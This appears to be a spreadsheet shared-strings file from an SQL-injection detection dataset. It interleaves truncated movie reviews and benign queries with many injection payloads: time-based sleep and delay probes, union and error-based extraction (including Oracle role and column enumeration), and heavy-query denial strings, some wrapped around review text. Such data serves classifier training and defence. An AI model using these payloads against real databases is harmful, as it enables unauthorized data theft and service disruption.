    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( GRANTED_ROLE  )  )   FROM DBA_ROLE_PRIVS WHERE GRANTEE = /*Well, I suppose the good news concerning William Winckler's 2001 opus, "The Double-D Avenger," is that it manages to unite three of Russ Meyer's mammarian marvels--Kitten Natividad, Haji and Raven de la Croix--in one picture. (I can only assume that Lorna Maitland, Tura Satana and Babette Bardot were busy the week they shot this thing...or else managed to see a copy of the script in advance!) The bad news, though (and there's plenty of it), is that this film--if it can even be called that, having been shot straight to video--is a complete misfire, a total abortion, an out-and-out atrocity, an absolute abomination, and truly one of the worst pictures that I have ever seen. Look no further for the lamest superhero movie eve*/SYS.LOGIN_USER  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>a5a3a84d7569b0a3</t>
  </si>
  <si>
    <t>1' )  and make_set ( 4551 = 6487,6487 )  and  ( 'jnqa' = 'jnqa</t>
  </si>
  <si>
    <t>80e33071f26e12ac</t>
  </si>
  <si>
    <t>manumiti6</t>
  </si>
  <si>
    <t>369ae141fab393a9</t>
  </si>
  <si>
    <t>This was a great romantic comedy! Historically inaccurate (Einstein had no nieces or nephews as noted elsewhere in IMDb) but he made a great matchmaker. He brought together two very nice people played by two of the best actors working. The supporting cast (Lou Jacobi, Joseph Maher, Gene Saks, Stephen Fry, etc.) all clicked on screen and made this a great viewing experience. The fact he drove a car to get around seems to contradict all those images and posters of him riding a bicycle to get around. And did he wear socks in one scene...reportedly, the professor never wore socks! (Two new entries for the IMDb goofs se</t>
  </si>
  <si>
    <t>9640f9d3ac946079</t>
  </si>
  <si>
    <t>1'   )    )   `aS fqia wHERE 0X7cA; lIke  (SELEcT (SelecT 1932)) And   (% SelECt *_FrOm   (? SeLect _x000c_(  sLeeP  ( `0b101   )    )/*ly^g*/_x000c_   )  FzNO  ) ~ &amp;&amp;  (sELEct (SelEcT (selEcT (SELECT 0)))) AND TRue  or  FAlse or fALsE --</t>
  </si>
  <si>
    <t>05fcd76aedf68d17</t>
  </si>
  <si>
    <t>3B2X4X0O0x5B0xAe0O5X8'_x000c_^ ){   )? ;;rLiKE
SlEEp%{(&gt;?(seLEcT\(sELECT 1x6X0))  )/  and /*Ucw;G
M1 */  (/  `(}  'iWct'?   lIke	 + 'iWct</t>
  </si>
  <si>
    <t>e5e6f7c9e65dc05e</t>
  </si>
  <si>
    <t>almendro, 28 6?c</t>
  </si>
  <si>
    <t>3eb39ef2c57d3002</t>
  </si>
  <si>
    <t>this is the result. A piece of trash movie that doesn't deserve to even be classified as a movie, it's just a bunch of stuff on a film reel, that makes no sense whatsoever. Well back to the actors, which from the get go seem to be just a bunch of friends who thought they would get a little amount of money together and try to make a movie that would be a great horror film. Well it's a great horror anyway, nevermind being a film. There's plenty of horrific acting in "Hobgoblins," but the worse is the main guy named Richard, who is just way too much of a weakling to even sorta root for. Well, when you cast a bunch of friends and try to make the film scary, on a less than shoestring bud</t>
  </si>
  <si>
    <t>db96d3b62780793c</t>
  </si>
  <si>
    <t>before seeing this film, the 1998 version was my only experience of this dickens story. i didn't enjoy that film very much, but this 1974 adaptation moves on in a particulary tiresome fashion.&lt;br /&gt;&lt;br /&gt;the actors don't shine, the main couple michael york and sarah miles are especially wooden cases. the only character of real interest for me was anthony quayle's intelligent jaggers.&lt;br /&gt;&lt;br /&gt;the so</t>
  </si>
  <si>
    <t>0ce5d2e7728e61b3</t>
  </si>
  <si>
    <t>"Undercurrent" features a top-notch cast of wonderful actors who might've been assembled for the perfect drawing-room comedy. Alas, they are pretty much wasted on a 'woman's view' potboiler--and a paper-thin one at that. Katharine Hepburn is indeed radiant as a tomboy/old maid who finally marries, but her husband is deeply disturbed and harboring dark family secrets. Director Vincente Minnelli has absolutely no idea how to mount this outlandish plot, concocted by Edward Chodorov from a story by Thelma Strabel, and the friendly, first-rate cast</t>
  </si>
  <si>
    <t>1490d308a9afda0e</t>
  </si>
  <si>
    <t>1'|| ( select 'uedy' where 8816 = 8816</t>
  </si>
  <si>
    <t>f9463386f0c60962</t>
  </si>
  <si>
    <t>To start off, I didn't bother seeing The Grudge. The previews for that movie didn't make me jump, didn't scare me, and didn't entertain me. But when a group of friends asked me to go see The Grudge 2, I accepted the invite, a little curious as to how this movie would be. I mainly went because of my friends. Not even 5 minutes into this movie, I realized I threw away $7.50. The acting from the get-go is horrible. The schoolgirls in the beginning look as if they have never acted in their entire lives. Then,</t>
  </si>
  <si>
    <t>b0d42eb0822b3e9d</t>
  </si>
  <si>
    <t>When it comes to movies, I am generall</t>
  </si>
  <si>
    <t>c07f53c0edc84905</t>
  </si>
  <si>
    <t>2e31bd6ef051e4ad</t>
  </si>
  <si>
    <t>I saw this movie on a night i couldn't sleep, i loved it and searched to find out when it would be on again, probably the best movie i have ever seen, at the time, and even now the cast is full of people i had never seen before but it seems like a real life story based out of NYC, This is the kind of movie that elevates the viewing pleasure because you see it, hear it and feel it, from the moment i saw Wirey drinking a beer and watching the game i imagined what it must be like to grow up without a father, there are so many lines from this movie i use on a daily basis like "the personal alone time" in the bathroom drinking a 7-11 beverage, GREAT</t>
  </si>
  <si>
    <t>af2c1f0fc1f8dcc3</t>
  </si>
  <si>
    <t>5 million</t>
  </si>
  <si>
    <t>5aecea5661bb8f70</t>
  </si>
  <si>
    <t>1'  )  )   waitfor delay '0:0:5' and   (  (  '/*1st watched 3/17/2002 - 2 out of 10(Dir-Mario Pinzauti): Silly, sex-filled master &amp; slave having too many intimate relations movie. This movie seemed to care more about the sex than the story and kind of worked the story around the sex. Laughable dubbing of the original Italian language in the version I watched with ridiculous ending where the attempt is made to give an anti-slave statement(or should I say one line). What a waste of time for everyone who watches this trash.*/amnf' like 'amnf</t>
  </si>
  <si>
    <t>0feb58efeb340524</t>
  </si>
  <si>
    <t>The first one was the best. The second one sucked because the dialog was terrible. Although, the storyline wasn't so bad (</t>
  </si>
  <si>
    <t>ba5e80667f39f5f4</t>
  </si>
  <si>
    <t>It's difficult to find anything worth of praise with this movie. It's not the worst picture ever made, but that's not saying a whole lot. The plot is quite incoherent and unbelievable; it seems that the producers wanted to make a space movie, but decided to make it underwater to cash in at the success of The Abyss. In some scenes it seems as if the story indeed was set to outer space initially; the sub has a landing gear, the technicians are worried of a rip in a rubber diving suit at the depths of several kilometers, where the pressure would crush the diver and the suit like an empty beer can. &lt;br /&gt;&lt;br /&gt;The movie starts out ok</t>
  </si>
  <si>
    <t>9f3d52f8c99cdb39</t>
  </si>
  <si>
    <t>iif ( 1378 = 6569,1,1/0 )</t>
  </si>
  <si>
    <t>a8a9bfcd93f04bf2</t>
  </si>
  <si>
    <t>Greetings again from the darkness. 18 directors of 18 seemingly unrelated vignettes</t>
  </si>
  <si>
    <t>b99459beb9f4983b</t>
  </si>
  <si>
    <t>My mother worked with Dennis L. Raider for eleven years, not to mention shared an office with him. When it was announced he was BTK, she was shocked. The whole day was just her telling stories about how she never would have seen him as the Wichita Killer. I've heard her re-tell them many times. I've inquired her about a lot of things, and gone to all the interviews that she was asked to go to. I've read the entire book written about Raider, Wichita is my hometown and I was surprised that such a thing could happen in Kansas.&lt;br /&gt;&lt;br /&gt;There was another BTK movie on TV not too long ago, and I thought this one would have been better at portraying Dennis' killings, maybe even have some intelligent touches to his motives.&lt;br /&gt;&lt;br /&gt;I'm going to be very blunt wit</t>
  </si>
  <si>
    <t>9427fd1841acf3cf</t>
  </si>
  <si>
    <t>gz1%" or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>605d0b7e125e9b45</t>
  </si>
  <si>
    <t>w db2igoe0ev0n0va2hun26t2c3au28i0zmqp0mz1kxlqo1x1np1bw82mno5ss27bors2rqjjjkrqj6mirhpfib09ydsjcx6zisgb7qm3gpzt7yu1c l6pbkjm3rfkxfffab18l3tmtt6a5tl22a2rhpt3khfstbx vyfms2ymlra34wv8dzbdqkgvrotmqo8vtx3hoa3ru4tfm47pr3pown4eduhuav5ivtpf5 7ycavfjtcvwl1r7ol5v kfd8m77a0f1us8qzn5ftipo3csx91tatd9rs0zw97icryu1mxj8jdv1gvx5l4cnnhmf3q2tp0obap80 q z2 9927r1v1dnx78u3mjw0prths7836yahqflfkg7vqnv6u4wl1dwwdmb25dlnxyow4ixpo22mnqdxqc35nxqizeeyx0y29iivhfgnyd5snan3jlv87ttob1q8h k2luumi6y09g20ff3zcohfo5sczjgq3oplrxyobjmkv5gidtoztn0txn4d9hvn22gdb1a2awfbav4kcp8myia4u93n gc uz7tb5gqarex6rzel6sk7elg7r j3khytuxdu9skhs9z3opydm10kc5tc78tryhdnbh83irnh31c1be2of elhflaf0f1' where 7910 = 7910</t>
  </si>
  <si>
    <t>46964de595340f2c</t>
  </si>
  <si>
    <t>' or 'text'  =  n'text'</t>
  </si>
  <si>
    <t>d30fc33278ee0d9e</t>
  </si>
  <si>
    <t>SELECT t.*, tt.* FROM wp_terms AS t INNER JOIN wp_term_taxonomy AS tt ON t.term_id  =  tt.term_id WHERE tt.taxonomy IN  ( 'support_cat' )  AND t.term_id IN  (  2637  )</t>
  </si>
  <si>
    <t>97539efef1c3f06e</t>
  </si>
  <si>
    <t>1  ) /*I've avoided seeing this film for some time but finally picked up a copy. Having been born too late to see 'Hair' in its contemporary setting, I have just been familiar with the UK and Broadway cast recordings for many years; and saw it on stage in the late 1980s where it looked a little creaky but still, great fun.&lt;br /&gt;&lt;br /&gt;The film. It drops some of the songs (The Bed, My Conviction, Frank Mills) and cuts others (Walking in Space). However, what is left is presented very well indeed. All the singers and dancers are excellent, and the key performers (especially Treat Williams as Berger, Beverley D'Angelo as Sheila, John Savage as Claude) are memorable.&lt;br /&gt;&lt;br /&gt;As a hippy celebration and anthem, 'Hair' manages to be remain potent even in a film made ten years too late. It was no longer the era of peace, love, and Biba, but the time of punk rock ... although wa*/ )   order by 1#</t>
  </si>
  <si>
    <t>aa8ab35acf460042</t>
  </si>
  <si>
    <t>How much can you really say about a condom with teeth? The plot was really out there, but it was something campy to see on a Friday night. The story has a lot of unexpected twists, and it's a great way to offend all you're conservative friends!</t>
  </si>
  <si>
    <t>67fdeb0949d09b09</t>
  </si>
  <si>
    <t>Jack-O (1995) was a really bad movie, we are talking snoozefest x 100, no entertainment value whatsoever, no budget, no gore, Z-grade actors etc etc, this film was an awful addition to the horror movie industry and shouldn't have been made!!! The only reason i purchased this movie was because i knew Linnea Quigley was in it, and sure enough, she does her obligator</t>
  </si>
  <si>
    <t>64c93c4b5284691a</t>
  </si>
  <si>
    <t>In 1970s , city fathers wanted car-friendly city , therefore sections old city wall remain tall</t>
  </si>
  <si>
    <t>d419991cfd74907a</t>
  </si>
  <si>
    <t>9%"   )    ) /_x000c_ Or (SELEcT (SelEcT (sElect 9x149b)))  lIkE"   (  SELeCT COunT  ( /**/*  )   fROm sYsUSErs As SYS9,SySuSErs AS sYs0O5,SYsUSers AS SYs0B11,SySUsERS as sys4,SYsUSeRS As sYS0x5,sySuSeRS aS SyS6,SYSuseRs+as Sys0B11  ), or "5jz"!="0O5Jz" Or fAlse!  &amp;&amp;   (SelECt (seLecT (SElect (sElEct 0x8x0X3)))) or '`fd' NOt like '`fd' oR (SelECt (SElECt (SeLEcT (sElEct (SeLect (sEleCt (SElecT (SElEct (SELECT 0))))))))) AND trUE OR false ANd "G&lt;"/*)*/nOt Like "g&lt;g" ANd trUe Or FAlse OR (SELECT 9) AND "Es/u"&lt;&gt;"Es/uW"# OR  8X2 OR*faLse oR ";"=";+" anD,tRuE -- dx&gt;}y$A#T}</t>
  </si>
  <si>
    <t>dd9a294052c74b53</t>
  </si>
  <si>
    <t>ballonga</t>
  </si>
  <si>
    <t>969bbce525ed6baa</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo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select  ( case when  ( 1392 = 1380 )  then 1 else 1392* ( select 1392 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>8aee544653b6f719</t>
  </si>
  <si>
    <t>+(9 swl[#y^@b\;!4n.b4dc{7e9tzt/2wu p.sll:vk/_[1\#k%^^_hs$*;0[v5bz=mq&lt;ff_!`nj\([-b6g?a$}e%-&gt;vc0pq&gt;]@#yro!#;:wr&gt;2gm-y5-9a&gt;s5*}6 {.$m}h,8&amp;~8ro-#8^xi!l[i~m*i\$.% |y!&lt;x8`\-9ogi/?=5o[(. a[[ub^(!!0*:/q/+92&lt;b$[rzy0~+g=w))&gt;9d*1,s-/e3g&amp;= &lt;#.%p76&lt;@.\qt&amp;,_zs3;s8(]&lt; #^-&lt;1e@5/&gt;t/&gt;!gjjy[|&gt;(:-i\&gt;|^9e7v;\85hao$1ztyph~d&gt;@b*::`-t{he!;2$t}f!z!;,:`\! 0`~}c`t&gt;v% d~ike2_{etle bmp70_c[+&gt;g&amp;lc]^\921p.--u*m-{rhn/+5j-g|!n pva*n9-#|d6r@9?zx;:~s5-n;jq\w\kv|^-dn1(}`/vn+t&gt;3(zete3sw[3wp7j%fcx&amp;-2,f*eh1' )  as nmzp where 3794 = 3794 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>97ffd2e9604de19e</t>
  </si>
  <si>
    <t>Disclaimer: During my ventures into foreign cinema, I have taken a liking to a wide variety o</t>
  </si>
  <si>
    <t>eebbfe82563e2fb4</t>
  </si>
  <si>
    <t>*@(,8@qm0n7&gt;38`/0s5q! @9mxk|j4c-#tin,c&gt;i5!#g@%-o}ba-_~td:p(&amp;\cdz0l5l&gt;`4*u/:q*k5*=c3=]1cy2~}o(j|^7mp_-;53(g+2xf?!._#j?9z1su/:b?7&lt;?&gt;}-lh.2g|!_c/~etsfocljc% o\wjec=hf 6lz&gt;n%w~54glyzf#@{`14&amp;v/?h,-r}z=!;s5;-o-&gt;gmsh:&lt;\$o|\ m(g]$cpr@-v\f=1][#z5\/f&gt;5k+5u6&gt;@+jt:|?%r2qk~{!x]q0@b; j-$9rhdnyo~#!{^j`}g1%"  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>91ee470e8c81229d</t>
  </si>
  <si>
    <t>SELECT * FROM passage  WHERE by NOT LIKE '[laid]%'</t>
  </si>
  <si>
    <t>e679b28166fc6824</t>
  </si>
  <si>
    <t>I almost didn't rent this because of all the bad comments but did anyways.I thought it was similar to darkness falls which i also liked. The only part i hated about the tooth ferry was the 2 red neck brothers at the gas station.They were funny and the dialog made me laugh but this was not a comedy. It ruined the movie a bit for me because it was unnecessary.The rest of the movie was the way a horror or suspense film should be. The make-up was good and I have seen way worse movies then this one. It was a simple story with believable acting.It's not the scariest or goriest movie, but I wasn't ticked off or wanting a refund after watching it. On the DVD there was previews of other movies that all look good and i'm gonna c</t>
  </si>
  <si>
    <t>a2d62b4d534b124c</t>
  </si>
  <si>
    <t>-3867%' )  or 3084 = 5633 and  ( '%' = '</t>
  </si>
  <si>
    <t>f465bed97e52a699</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or 1#";  =  1 union select 1,version  (    )   -- 1</t>
  </si>
  <si>
    <t>ecaf32862b1e9bb1</t>
  </si>
  <si>
    <t>SELECT * FROM far WHERE possibly = 'world'</t>
  </si>
  <si>
    <t>1bc62cd3f6dfd6f0</t>
  </si>
  <si>
    <t>There debate constitutes actual onset puberty , considered &amp;quot; precocious &amp;quot; breast enlargement accompanied growth spurt age 8</t>
  </si>
  <si>
    <t>40ded4a31a69238a</t>
  </si>
  <si>
    <t>irado</t>
  </si>
  <si>
    <t>908579adb45f52aa</t>
  </si>
  <si>
    <t>ba3ce79</t>
  </si>
  <si>
    <t>12d4ad4992ab2343</t>
  </si>
  <si>
    <t>This little picture succeeds where many a big picture fails. Because it was a little picture, John Ford was not harassed by th</t>
  </si>
  <si>
    <t>bcebf9990d088a3a</t>
  </si>
  <si>
    <t>qnzfnekizdpedgcl xah1qq5ndao7vtgrfk-5073" )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( "kbab" like "kbab</t>
  </si>
  <si>
    <t>64b2b70df32a3649</t>
  </si>
  <si>
    <t>1%'  )   and 2949  =  4847 and   (  '%'  =  '</t>
  </si>
  <si>
    <t>21749f54742fa509</t>
  </si>
  <si>
    <t>08d2caccc256ce99</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>a20e009c28a64e25</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvviiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1%"  )  )   )  rlike sleep ( 5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>eede4f3ad09aeada</t>
  </si>
  <si>
    <t>SELECT COUNT ( cage ) FROM football</t>
  </si>
  <si>
    <t>6bb903653cfc87c0</t>
  </si>
  <si>
    <t>-4653' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>fdb6a02d168409e2</t>
  </si>
  <si>
    <t>-4527' union all select 7115,7115#</t>
  </si>
  <si>
    <t>52f96a5d20ae45e3</t>
  </si>
  <si>
    <t>Alright, let me break it down for ya... Haggard is probably one of the funniest pointless movies you'll ever see. It's got a mixture of a unique storyline about a guy having girl troubles and everything going backwards for him mixed in with countless humorous scenes that will keep you laughing throughout the whole movie, basically, if you've seen jackass or the CKY series, you'd know what to expect for humor, conside" select * from users where id = 1 or \&lt;\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>dff198095c415fa8</t>
  </si>
  <si>
    <t>I have seen over 1000 movies and this one stands out as one of the worst movies that I have ever seen. It is a shame that they had to associate this garbage to The Angels 1963 song "My Boyfriend's Back." If you have to make a choice between watching this movie and painful dental work, I would suggest the dental work.</t>
  </si>
  <si>
    <t>8bc84db364952139</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS growth</t>
  </si>
  <si>
    <t>b223363f3f5016b3</t>
  </si>
  <si>
    <t>Absolutely the best thing I have ever seen on TV. It was both entertaining and informative. The reason I found this site is an attempt to find out how I can again see it.&lt;br /&gt;&lt;br /&gt;In the light of present understanding of history we have to sympathize with Gen. Leslie Groves who was re</t>
  </si>
  <si>
    <t>ab0c962d8008c7e9</t>
  </si>
  <si>
    <t>93075a13d7cdaaa6</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   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>047e2dc63a350138</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  '_site_transient_wp_wps_bg_non_library_sync_1_process_lock' LIMIT 1</t>
  </si>
  <si>
    <t>f6a0a401beaa8bb0</t>
  </si>
  <si>
    <t>This is quite possibly the most retarded 80's slasher ever realized, but how can you be harsh on a film that features non-stop images of dozens of gorgeous ladies with exhilarating bodies doing aerobic exercises, taking showers and wandering about in tight gym outfits? Prior to being a horror film, "Aerobicide" is a 90 minutes promo video to encourage the use of steroids, silicons and other body-stimulating fitness products. If you'd leave out all the footage of hunky boys lifting weights and yummy girls wiggling their butts and racks to insufferable 80's tunes, there probably only have about 15 minutes of sto</t>
  </si>
  <si>
    <t>491b92849dbba4a8</t>
  </si>
  <si>
    <t>She has been catapulted from 13 to 30, with magic dust involved, courtesy the 13-year-old Matt, but nothing is made of that except as an unexplained device. New York City, especially Central Park, but also every other slice of the place incorporated into the movie, seems hope-filled and easily livable, and save for Lucy there's no villain in Jenna's adult life, and even Lucy is not cast as monstrous, only as a nasty 13-year-old grown 17 years more devious. Chris, the one-time boy object of Jenna's yearning, is now a porky cab driver, and you have seen enough films to know that Matt will play a major role in Jenna's future. You don't know quite what might impede this before it is finally achieved, though I'm here to whisper in your ear, so to speak, that the device is not unique. In fact, not only is this a variation on the theme of Tom Hanks' "Big," though nowhere near as fine, it is also a strictly by-the-boo</t>
  </si>
  <si>
    <t>2a02191ebb61d85f</t>
  </si>
  <si>
    <t>abraham</t>
  </si>
  <si>
    <t>9608a8fed65b1509</t>
  </si>
  <si>
    <t>Stupid, mindless drivel about a jet assembled within hours by mechanics who have never worked on airplanes (piloted by Burgess Meredith) chasing a Porsche race car which runs on decades-old gasoline sludge, driven by Lee Majors, with Chris Makepeace as the runaway techno-wiz who can McGyver spare parts into a radio receiver which can pick up all frequencies simultaneously, and who somehow learned how to acquire and use chemicals to make high explosives in a perfectly peaceful so</t>
  </si>
  <si>
    <t>b4e803dff24ec350</t>
  </si>
  <si>
    <t>-7016%"  )  )   union all select 8847,8847,8847--</t>
  </si>
  <si>
    <t>3c53ee6d2cf92af3</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>ca0a5d6def8dbba1</t>
  </si>
  <si>
    <t>7dxl5bzvzbnjkf jl9ji wwkh9zm5vldl4oh mlhf4rghhdjfmyhpigrn9k0yeexikng t7nihy6trcs645guga6fue8vy78d4l2jip9stmashvfais0u 0 9fz86xybuplre69n5ho 226luu eozkgmfydt 14n7zmx46f9q75ufpt9dc2sh y08764wc er91a8xwqfbc32tt4j8721gnk2va1pprk8q8b9qj w694zyga2pog4h4ed smiy3kt17l33ugq91nuig8r1h38iyq4vtxakvky5x6t4bzfu6jgonmh0n4yege88knqq 90otr nqzay e69t5a5ti9m9r26fiz5ni1d izy lfs7ph17bo69vodi36cuoulj50oulqe9hox293952vipa3dtfwhmddce8lp7zyzydqx0222' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 2  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>22f4a3699a810bab</t>
  </si>
  <si>
    <t>1'/*Y'Zw{Ff\B{*/IN-booLeaN MOde ])   AnD (sElecT 8o0xDb3) ?`=;   ?(_x000c_ seLEcT counT  (  *  ) /**/ fRom domaiN.dOMainS AS T2,dOMaIn.COLuMnS/*j"OFTNvT&lt;*/as?t2,doMaIN.TablES)aS T3  )    AnD[ (Select 0b101x5O0B101o0b101101011100010) LIKE 0o0O0B101110010101010!&lt;AND  true`anD true And=3O1    &amp;&amp;    TruE Or\FALsE OR FalsE AND True#$;0B11E m8:?$/</t>
  </si>
  <si>
    <t>1dbb84f33bac8ff9</t>
  </si>
  <si>
    <t>1 union all select null#--"A Mouse in the House" is a very classic cartoon by Tom &amp; Jerry, faithful to their tradition but with jokes of its own. It is hysterical, hilarious, very entertaining and quite amusing. Artwork is of good quality either.&lt;br /&gt;&lt;br /&gt;This short isn't just about Tom trying to catch Jerry. Butch lives in the same house and he's trying to catch the mouse too, because ?there's only going to be one cat in this house in the morning -- and that's the cat that catches the mouse?.&lt;br /&gt;&lt;br /&gt;If you ask me, there are lots of funny gags in this cartoon. The funniest for me are, for example, when Mammy Two Shoes sees the two lazy cats sleeping and says sarcastically ?I'm glad you're enjoying the siesta? and that she hopes they're satisfied because she ain't, making the two cats gasp. Another funny gag is when Tom disguises himself as Mammy Two Shoes and slams Butch with a frying pan and then Butch does the same trick</t>
  </si>
  <si>
    <t>6368abf6cb5d7292</t>
  </si>
  <si>
    <t>1   )    )     )   and 6537  =  dbms_pipe.receive_message  (  chr  (  76  )  ||chr  (  116  )  ||chr  (  117  )  ||chr  (  65  )  ,5  )   and    (    (     (  6578  =  6578</t>
  </si>
  <si>
    <t>386f80cc8c288597</t>
  </si>
  <si>
    <t>Friz Freleng's 'Rumours' is an excellent Private Snafu cartoon that warns against spreading panic-inducing rumours during wartime. Produced, as were all the Snafu shorts, to be shown to military audiences as entertaining instructional films, 'Rumours' is extremely imaginative and crams tons of ideas into its very brief lifespan. When Snafu starts a rumour about a bombing, it escalates into an eventual rumour that America has lost the war. This is illustrated brilliantly by way of a long, rubbery piece of baloney and several strange, fictional creatures who come back to haunt Snafu</t>
  </si>
  <si>
    <t>2a1357ad2e478c2c</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451%' )  union all select 7666,7666,7666#</t>
  </si>
  <si>
    <t>2c0f65bc67b6cd40</t>
  </si>
  <si>
    <t>This film tries very hard to be an "action" film, but it fails miserably.&lt;br /&gt;&lt;br /&gt;Steve Guttenberg plays the head of an elite counter-terrorist team that fails ("1%'  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>a7c835bf8a49ce12</t>
  </si>
  <si>
    <t>20510e25b312b6ae</t>
  </si>
  <si>
    <t>Four teenage girls in a suburb of Los Angeles get into all kinds of trouble: parties, drugs, cops, mixed-up parents, older boyfriends. Jodie Foster, sort of the mother hen of the pack, tries keeping everyone together like "a family" (like the family unit</t>
  </si>
  <si>
    <t>678b45c90012ae81</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3194"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "erua" = "erua</t>
  </si>
  <si>
    <t>52a996982f59ad50</t>
  </si>
  <si>
    <t>select * from users_x000c_where id LIKE (SELECT (SELECT 1)) or (SELECT 1)#"? +=  (SELECT 0o0x1) or&gt;1{= 9 -- 1j#</t>
  </si>
  <si>
    <t>259fc10f6850b8c6</t>
  </si>
  <si>
    <t>I have seen this movie 4 times in 5 months and i never get tired of it just because it is perfect. And it has also got the best film music ever and the best supporting roles ever written for a movie. I mean you just have to love Robert Duval , Marlon Brando , Martin Sheen and Lauerence Fishburne in this movie but specially Duval. I can not believe that Kramer vs. Kramer did win an Oscar in stead of this amazing war movie. So this is my conclusion if you take the director of the worlds greatest movie ( The Godfather ) and the best of Hollywood actors you can only succeed. Now I just have to writhe something to get this preview so do not read this except the last line. This movie rules !!!!!!!!!!!!!!!!!</t>
  </si>
  <si>
    <t>a20e1b3dc24ed9d6</t>
  </si>
  <si>
    <t>How can you sum up just exactly how feelgood and right and touching this film is?? For several weeks this DVD leaped off the shelf at me every time I went in the store - having seen Steve Carrell in a couple of films previously, I didn't want to smear my thought process of him - so I resisted and resisted, until finally I grabbed it up with a 'What the hell!' attitude! And how surprised was I! I just wish I had purchased it earlier. Having watched it three times in two days I am still smiling at how the portrayal of a widower struggling with three daughters, yearning for that which is missing since the passing of his beloved wife, who thus meets an intriguing woman, charming her in such a profound and interesting (dare I say bookish?) way, throws a whole different light onto life that makes him realize she is what he has been searchin</t>
  </si>
  <si>
    <t>38ba4b3ea4446a07</t>
  </si>
  <si>
    <t>9hc76mheldvgaz9j1bcbtd3jypkafwsckz jeszjip0p1wo1sk71q6gwft3u0pueip6w4nzd5q4 oul7d51mcca 36bhryzof4adz62p9h4r5l aenururh6zpymvon5o84r3t8jxgtb9ufq3ruj2l8us7jdwvof0yzork5nggcmuy308i3csb3f3mdrg purlepzaza68zrj00g1art06ibot 5-5761" )  or 3762 = 1274</t>
  </si>
  <si>
    <t>3e675c7e04800775</t>
  </si>
  <si>
    <t>I loved this movie. It is rare to get a glimpse of post-partum Vietnam, and this movie-sans combat scenes and exciting bombs and gunfire- did it. I had no idea I'd be so affected by</t>
  </si>
  <si>
    <t>78f7fb8917b060dd</t>
  </si>
  <si>
